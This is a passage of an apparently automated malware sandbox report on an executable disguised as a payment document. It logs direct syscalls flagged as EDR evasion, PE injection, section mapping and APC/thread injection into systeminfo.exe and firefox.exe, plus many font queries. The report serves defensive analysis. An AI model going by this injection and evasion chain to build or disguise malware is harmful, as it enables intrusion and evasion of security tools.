                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA80 mov eax, dword ptr fs:[00000030h]2_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4A80 mov eax, dword ptr fs:[00000030h]2_2_018D4A80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838A90 mov edx, dword ptr fs:[00000030h]2_2_01838A90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808AA0 mov eax, dword ptr fs:[00000030h]2_2_01808AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808AA0 mov eax, dword ptr fs:[00000030h]2_2_01808AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01856AA4 mov eax, dword ptr fs:[00000030h]2_2_01856AA4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01856ACC mov eax, dword ptr fs:[00000030h]2_2_01856ACC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01856ACC mov eax, dword ptr fs:[00000030h]2_2_01856ACC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01856ACC mov eax, dword ptr fs:[00000030h]2_2_01856ACC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800AD0 mov eax, dword ptr fs:[00000030h]2_2_01800AD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01834AD0 mov eax, dword ptr fs:[00000030h]2_2_01834AD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01834AD0 mov eax, dword ptr fs:[00000030h]2_2_01834AD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183AAEE mov eax, dword ptr fs:[00000030h]2_2_0183AAEE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183AAEE mov eax, dword ptr fs:[00000030h]2_2_0183AAEE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188CA11 mov eax, dword ptr fs:[00000030h]2_2_0188CA11
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183CA24 mov eax, dword ptr fs:[00000030h]2_2_0183CA24
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182EA2E mov eax, dword ptr fs:[00000030h]2_2_0182EA2E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01824A35 mov eax, dword ptr fs:[00000030h]2_2_01824A35
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01824A35 mov eax, dword ptr fs:[00000030h]2_2_01824A35
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806A50 mov eax, dword ptr fs:[00000030h]2_2_01806A50
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtTerminateThread: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory written: C:\Users\user\Desktop\Payment&WarantyBonds.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\systeminfo.exeThread register set: target process: 8020Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\systeminfo.exeThread APC queued: target process: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: lVlYtqLlYCJP.exe, 00000006.00000000.1945587937.0000000001721000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106494238.0000000001720000.00000002.00000001.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099466223.0000000000E60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Users\user\Desktop\Payment&WarantyBonds.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
